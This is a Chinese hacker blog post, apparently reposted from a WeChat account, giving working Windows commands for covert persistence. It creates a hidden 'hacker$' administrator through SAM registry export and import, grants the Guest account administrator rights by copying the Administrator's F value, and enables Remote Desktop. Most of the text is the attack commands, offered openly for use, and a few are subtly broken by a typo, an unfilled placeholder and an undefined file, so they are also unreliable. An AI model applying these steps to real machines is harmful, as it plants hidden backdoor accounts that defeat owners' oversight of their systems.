前言1:我那个脚本可以用,如果出现问题,关掉窗口再执行一遍。
前言2:据一位没有性生活的男粉丝提示,用户在加了administrators组后,把用户的F值改为超管的F值是没有意义。仔细一看,的确是,果然不能无脑抄陈年网文。
1.添加隐藏用户
用户在加了administrators组后,把用户的F值改为超管的F值是没有意义
net user hacker$ donotusetohack /add
#添加帐号hacker$
net localgroup administrators hacker$ /add
#把帐号添加到管理组
reg export hklm\SAM\SAM\Domains\Account\Users\Names\hacker$ hacker_name.reg
#导出hacker$的用户名信息
reg export hklm\SAM\SAM\Domains\Account\Users\000003EE{hacker_type} hacker_account.reg
#导出hacker$的帐号信息
net user hacker$ /del
regedit /s hacker_name.reg
regedit /s hacker_account.reg
net user hacker$ /active:yes
按照上面的操作进行添加是可以做到:
命令行隐藏和控制面板隐藏,但是在windows企业版的控制面板下是可以看到创建的用户的。
2.guest用户赋权
既然可以看到用户就增加了暴露的风险,作为一名优质的黑客,当然得有精益求精的精神。既然会被看到我们可以尝试利用同样的姿势更改guest用户的F值,给guest赋权。
2.1操作如下
net user guest happyhack
#增加guest帐号密码
reg export hklm\SAM\SAM\Domains\Account\Users\000001F5 guest.reg
#导出guest帐号信息(需要system权限)
reg export hklm\SAM\SAM\Domains\Account\Users\000001F4 admin.reg
#导出administrator帐号信息(需要system权限)
powershell "$a=(Get-Content -Path .\1.reg -TotalCount 100)[3..6];$b=(Get-Content -Path .\admin.reg -TotalCount 100)[0..2];$c=(Get-Content -Path .\guest.reg -TotalCount 100)[7..99];$b+$a+$c>>1.reg"
#替换guestF值并输出到1.reg
regedist /s 1.reg
#注册更改号的reg文件
net user guest /active:yes
#激活guest帐号
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fDenyTSConnections /t REG_DWORD /d 0
#开启远程卓弥岸
#编辑组策略允许guest本地和网络登录(图形化操作,命令一定有,自己去查)
可以达到效果:
1.在超级管理员组看不到用户
2.guest拥有管理员权限
写在最后:感谢那个没有性生活的男粉丝,顺带帮他找女朋友。
。:.゚ヽ(。◕‿◕。)ノ゚.:。+゚防盗专用。:.゚ヽ(。◕‿◕。)ノ゚.:。+゚
^_^文章来源:微信公众号(边界骇客) ^_^